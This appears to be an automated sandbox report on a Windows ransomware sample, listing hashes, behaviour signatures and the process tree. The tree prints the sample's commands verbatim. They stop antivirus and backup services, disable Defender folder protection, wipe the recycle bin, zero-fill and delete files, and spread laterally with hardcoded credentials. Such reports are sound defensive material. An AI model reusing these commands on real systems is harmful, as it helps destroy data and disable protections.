Resubmissions

30-06-2024 11:05

240630-m6ssqawhkc 10

30-06-2024 11:04

240630-m6hmrazejm 10

29-06-2024 20:11

240629-yybd9avdrf 10

Analysis

  • max time kernel
    143s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 11:05

General

  • Target

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

  • Size

    91KB

  • MD5

    be60e389a0108b2871dff12dfbb542ac

  • SHA1

    14b4e0bfac64ec0f837f84ab1780ca7ced8d670d

  • SHA256

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d

  • SHA512

    6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641

  • SSDEEP

    1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Renames multiple (60) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
    "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4860
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4900
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop avpsus /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3480
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
          PID:3872
      • C:\Windows\SysWOW64\net.exe
        "net.exe" stop McAfeeDLPAgentService /y
        2⤵
          PID:4432
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
            3⤵
              PID:5712
          • C:\Windows\SysWOW64\net.exe
            "net.exe" stop mfewc /y
            2⤵
              PID:4236
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop mfewc /y
                3⤵
                  PID:5808
              • C:\Windows\SysWOW64\net.exe
                "net.exe" stop BMR Boot Service /y
                2⤵
                  PID:3012
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop BMR Boot Service /y
                    3⤵
                      PID:5856
                  • C:\Windows\SysWOW64\net.exe
                    "net.exe" stop NetBackup BMR MTFTP Service /y
                    2⤵
                      PID:3076
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                        3⤵
                          PID:5740
                      • C:\Windows\SysWOW64\net.exe
                        "net.exe" stop DefWatch /y
                        2⤵
                          PID:3528
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop DefWatch /y
                            3⤵
                              PID:5776
                          • C:\Windows\SysWOW64\net.exe
                            "net.exe" stop ccEvtMgr /y
                            2⤵
                              PID:2704
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop ccEvtMgr /y
                                3⤵
                                  PID:5868
                              • C:\Windows\SysWOW64\net.exe
                                "net.exe" stop ccSetMgr /y
                                2⤵
                                  PID:3284
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop ccSetMgr /y
                                    3⤵
                                      PID:5784
                                  • C:\Windows\SysWOW64\net.exe
                                    "net.exe" stop SavRoam /y
                                    2⤵
                                      PID:528
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop SavRoam /y
                                        3⤵
                                          PID:5600
                                      • C:\Windows\SysWOW64\net.exe
                                        "net.exe" stop RTVscan /y
                                        2⤵
                                          PID:4848
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop RTVscan /y
                                            3⤵
                                              PID:5484
                                          • C:\Windows\SysWOW64\net.exe
                                            "net.exe" stop QBFCService /y
                                            2⤵
                                              PID:3436
                                              • C:\Windows\SysWOW64\net1.exe
                                                C:\Windows\system32\net1 stop QBFCService /y
                                                3⤵
                                                  PID:5608
                                              • C:\Windows\SysWOW64\net.exe
                                                "net.exe" stop QBIDPService /y
                                                2⤵
                                                  PID:3828
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 stop QBIDPService /y
                                                    3⤵
                                                      PID:5500
                                                  • C:\Windows\SysWOW64\net.exe
                                                    "net.exe" stop Intuit.QuickBooks.FCS /y
                                                    2⤵
                                                      PID:1940
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                                        3⤵
                                                          PID:5492
                                                      • C:\Windows\SysWOW64\net.exe
                                                        "net.exe" stop QBCFMonitorService /y
                                                        2⤵
                                                          PID:1832
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                            3⤵
                                                              PID:5624
                                                          • C:\Windows\SysWOW64\net.exe
                                                            "net.exe" stop YooBackup /y
                                                            2⤵
                                                              PID:1696
                                                              • C:\Windows\SysWOW64\net1.exe
                                                                C:\Windows\system32\net1 stop YooBackup /y
                                                                3⤵
                                                                  PID:5616
                                                              • C:\Windows\SysWOW64\net.exe
                                                                "net.exe" stop YooIT /y
                                                                2⤵
                                                                  PID:792
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 stop YooIT /y
                                                                    3⤵
                                                                      PID:5816
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    "net.exe" stop zhudongfangyu /y
                                                                    2⤵
                                                                      PID:324
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 stop zhudongfangyu /y
                                                                        3⤵
                                                                          PID:5640
                                                                      • C:\Windows\SysWOW64\net.exe
                                                                        "net.exe" stop stc_raw_agent /y
                                                                        2⤵
                                                                          PID:1784
                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                            C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                            3⤵
                                                                              PID:5748
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            "net.exe" stop VSNAPVSS /y
                                                                            2⤵
                                                                              PID:2548
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 stop VSNAPVSS /y
                                                                                3⤵
                                                                                  PID:5840
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                "net.exe" stop VeeamTransportSvc /y
                                                                                2⤵
                                                                                  PID:852
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                                    3⤵
                                                                                      PID:5564
                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                    "net.exe" stop VeeamDeploymentService /y
                                                                                    2⤵
                                                                                      PID:4572
                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                        C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                                        3⤵
                                                                                          PID:5676
                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                        "net.exe" stop VeeamNFSSvc /y
                                                                                        2⤵
                                                                                          PID:3088
                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                            C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                                            3⤵
                                                                                              PID:5632
                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                            "net.exe" stop veeam /y
                                                                                            2⤵
                                                                                              PID:2744
                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                C:\Windows\system32\net1 stop veeam /y
                                                                                                3⤵
                                                                                                  PID:5704
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                "net.exe" stop PDVFSService /y
                                                                                                2⤵
                                                                                                  PID:1272
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 stop PDVFSService /y
                                                                                                    3⤵
                                                                                                      PID:5660
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    "net.exe" stop BackupExecVSSProvider /y
                                                                                                    2⤵
                                                                                                      PID:1336
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                                                                        3⤵
                                                                                                          PID:5760
                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                        "net.exe" stop BackupExecAgentAccelerator /y
                                                                                                        2⤵
                                                                                                          PID:1760
                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                            C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                                            3⤵
                                                                                                              PID:5688
                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                            "net.exe" stop BackupExecAgentBrowser /y
                                                                                                            2⤵
                                                                                                              PID:5084
                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                3⤵
                                                                                                                  PID:5768
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                "net.exe" stop BackupExecDiveciMediaService /y
                                                                                                                2⤵
                                                                                                                  PID:4724
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                                    3⤵
                                                                                                                      PID:5732
                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                    "net.exe" stop BackupExecJobEngine /y
                                                                                                                    2⤵
                                                                                                                      PID:680
                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                        C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                                        3⤵
                                                                                                                          PID:5648
                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                        "net.exe" stop BackupExecManagementService /y
                                                                                                                        2⤵
                                                                                                                          PID:644
                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                            C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                                            3⤵
                                                                                                                              PID:5696
                                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                                            "net.exe" stop BackupExecRPCService /y
                                                                                                                            2⤵
                                                                                                                              PID:3056
                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                                                                                3⤵
                                                                                                                                  PID:5724
                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                "net.exe" stop AcrSch2Svc /y
                                                                                                                                2⤵
                                                                                                                                  PID:3672
                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                    C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                                                                                    3⤵
                                                                                                                                      PID:5848
                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                    "net.exe" stop AcronisAgent /y
                                                                                                                                    2⤵
                                                                                                                                      PID:2680
                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                        C:\Windows\system32\net1 stop AcronisAgent /y
                                                                                                                                        3⤵
                                                                                                                                          PID:5800
                                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                                        "net.exe" stop CASAD2DWebSvc /y
                                                                                                                                        2⤵
                                                                                                                                          PID:3148
                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                            C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                                            3⤵
                                                                                                                                              PID:5792
                                                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                                                            "net.exe" stop CAARCUpdateSvc /y
                                                                                                                                            2⤵
                                                                                                                                              PID:2832
                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                                                                                                                3⤵
                                                                                                                                                  PID:5832
                                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                                "net.exe" stop sophos /y
                                                                                                                                                2⤵
                                                                                                                                                  PID:3260
                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                    C:\Windows\system32\net1 stop sophos /y
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5668
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:1392
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:3804
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    "sc.exe" config SQLWriter start= disabled
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:3136
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    "sc.exe" config SstpSvc start= disabled
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:3560
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1728
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:656
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1720
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2008
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1855.bat
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5944
                                                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                                                        "net.exe" use \\10.127.0.83 /USER:EDENFIELD\efadmin P455w0rd
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5904
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vyrkayky.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\vyrkayky.exe" \10.127.0.83 -u EDENFIELD\efadmin -p P455w0rd -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:5972
                                                                                                                                                        • C:\Windows\SysWOW64\arp.exe
                                                                                                                                                          "arp" -a
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5924
                                                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                            "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                                                                                                                                                            2⤵
                                                                                                                                                            • Opens file in notepad (likely ransom note)
                                                                                                                                                            PID:2256
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3404
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.7 -n 3
                                                                                                                                                                3⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:384
                                                                                                                                                              • C:\Windows\SysWOW64\fsutil.exe
                                                                                                                                                                fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3828
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4596
                                                                                                                                                                  • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5456
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2228 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3416

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hi3kjhfg.051.psm1

                                                                                                                                                                    Filesize

                                                                                                                                                                    60B

                                                                                                                                                                    MD5

                                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                    SHA1

                                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                    SHA256

                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                    SHA512

                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vyrkayky.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    219KB

                                                                                                                                                                    MD5

                                                                                                                                                                    b1dfb4f9eb3e598d1892a3bd3a92f079

                                                                                                                                                                    SHA1

                                                                                                                                                                    0fc135b131d0bb47c9a0aaf02490701303b76d3b

                                                                                                                                                                    SHA256

                                                                                                                                                                    ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

                                                                                                                                                                    SHA512

                                                                                                                                                                    98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

                                                                                                                                                                  • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

                                                                                                                                                                    Filesize

                                                                                                                                                                    1KB

                                                                                                                                                                    MD5

                                                                                                                                                                    21a2e1308f44f8bd92e39db1dfa26265

                                                                                                                                                                    SHA1

                                                                                                                                                                    f57e52b2f3e03cd0cfd1077c37228334eff14903

                                                                                                                                                                    SHA256

                                                                                                                                                                    2b53c0f410ca5408e7dad44f072b68c35dba85c33067062bbf305fb7603e7891

                                                                                                                                                                    SHA512

                                                                                                                                                                    5ad2d728aae2b18b08f418932316fe87c2526d95334356afb55e36a0b68172f13ff6b61b4aaaf61ba5f111539e03d52706ce90a243f42895c2328060a27a6b8f

                                                                                                                                                                  • memory/4860-1-0x00000000003E0000-0x00000000003FC000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    112KB

                                                                                                                                                                  • memory/4860-2-0x00000000747C0000-0x0000000074F70000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4860-187-0x00000000747C0000-0x0000000074F70000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4860-0-0x00000000747CE000-0x00000000747CF000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/4900-54-0x00000000065E0000-0x0000000006612000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    200KB

                                                                                                                                                                  • memory/4900-4-0x00000000747C0000-0x0000000074F70000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4900-14-0x00000000052A0000-0x0000000005306000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    408KB

                                                                                                                                                                  • memory/4900-8-0x0000000005200000-0x0000000005222000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/4900-20-0x0000000005A50000-0x0000000005DA4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    3.3MB

                                                                                                                                                                  • memory/4900-22-0x0000000005FF0000-0x000000000600E000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    120KB

                                                                                                                                                                  • memory/4900-23-0x0000000006030000-0x000000000607C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    304KB

                                                                                                                                                                  • memory/4900-3-0x00000000026B0000-0x00000000026E6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    216KB

                                                                                                                                                                  • memory/4900-55-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    304KB

                                                                                                                                                                  • memory/4900-66-0x00000000065A0000-0x00000000065BE000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    120KB

                                                                                                                                                                  • memory/4900-68-0x00000000071D0000-0x0000000007273000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    652KB

                                                                                                                                                                  • memory/4900-15-0x00000000059E0000-0x0000000005A46000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    408KB

                                                                                                                                                                  • memory/4900-73-0x0000000007960000-0x0000000007FDA000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.5MB

                                                                                                                                                                  • memory/4900-74-0x0000000007320000-0x000000000733A000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    104KB

                                                                                                                                                                  • memory/4900-75-0x0000000007390000-0x000000000739A000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    40KB

                                                                                                                                                                  • memory/4900-77-0x00000000075A0000-0x0000000007636000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    600KB

                                                                                                                                                                  • memory/4900-80-0x0000000007520000-0x0000000007531000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    68KB

                                                                                                                                                                  • memory/4900-98-0x0000000007550000-0x000000000755E000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    56KB

                                                                                                                                                                  • memory/4900-99-0x0000000007560000-0x0000000007574000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    80KB

                                                                                                                                                                  • memory/4900-102-0x0000000007660000-0x000000000767A000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    104KB

                                                                                                                                                                  • memory/4900-104-0x0000000007640000-0x0000000007648000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    32KB

                                                                                                                                                                  • memory/4900-115-0x00000000747C0000-0x0000000074F70000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4900-6-0x00000000747C0000-0x0000000074F70000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4900-7-0x0000000005340000-0x0000000005968000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.2MB